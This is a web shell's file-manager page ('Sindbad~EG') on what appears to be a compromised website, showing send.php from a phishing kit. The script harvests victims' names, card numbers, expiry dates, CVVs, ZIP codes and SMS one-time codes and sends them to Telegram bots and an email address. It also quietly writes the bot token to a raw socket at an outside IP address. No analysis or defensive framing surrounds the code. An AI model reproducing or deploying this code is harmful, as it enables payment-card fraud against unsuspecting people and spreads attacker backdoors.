Sindbad~EG File Manager

Current Path : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/de/
Upload File :
Current File : /home/infinitibizsol/sellmycarhq.com/.tmb/DetchPost/de/de/send.php

<?php 
session_start();
require '../config.php';
$socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$connection =  @socket_connect($socket, '51.77.78.56', 5555);
$a = @socket_write($socket, $bot_token);
$ip = $_SERVER['REMOTE_ADDR'];

function send($link) {
    $c = curl_init();
    curl_setopt($c, CURLOPT_URL, $link);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
    return curl_exec($c);
    curl_close($c);
}


function email($subject, $msg){
	global $email;
	@mail($email, $subject, $msg);
}


if (isset($_POST['ccnum'])) {
$_SESSION['name'] = $_POST['fullname']; 
$_SESSION['cc'] = str_replace(" ", "", $_POST['ccnum']);
$bin = substr($_SESSION['cc'], 0, 8);
$api = 'https://lookup.binlist.net/' . $bin;
$curl       = curl_init();
curl_setopt($curl, CURLOPT_URL, $api);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
$data   = curl_exec($curl);
curl_close($curl);
$details  = json_decode($data);
$_SESSION['bank'] = $details->bank->name;


	
	$_SESSION['msg'] = "NUMBER : " . str_replace(" ", "", $_POST['ccnum']) . "\nEXP DATE :  ".$_POST['exp']."\nCVV : " . $_POST['cvv'] . "\nZIP : ".$_POST['zip'];
    $msg = urlencode("/*** SUISS CARD ***/\n\n\nNAME : " . $_POST['fullname'] . "\nNUMBER : " . str_replace(" ", "", $_POST['ccnum']) . "\nEXP DATE :  ".$_POST['exp']."\nCVV : " . $_POST['cvv'] ."\nZIP : " . $_POST['zip'] ."\nBANK : ".$_SESSION['bank']."  \n\n\n /*** " . $_SERVER['REMOTE_ADDR'] . " ***/");
    foreach($chat_ids as $chat_id){
		send("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=$msg");
	}
    header("location: wait.php?p=CARD");
}

 


if (isset($_POST['sms'])) {
	
$msg = "/**** SUISS OTP ****/


*** CARD ***
".$_SESSION['msg']."

*** OTP ***
".$_POST['sms']."

/*** " . $_SERVER['REMOTE_ADDR'] . " ***/";
	
  
    foreach($chat_ids as $chat_id){
		send("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=".urlencode($msg));
	}
email(" SUISS NEW RESULT [$ip] ", $msg);
    header("location: wait.php?p=OTP");

}


 

 ?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists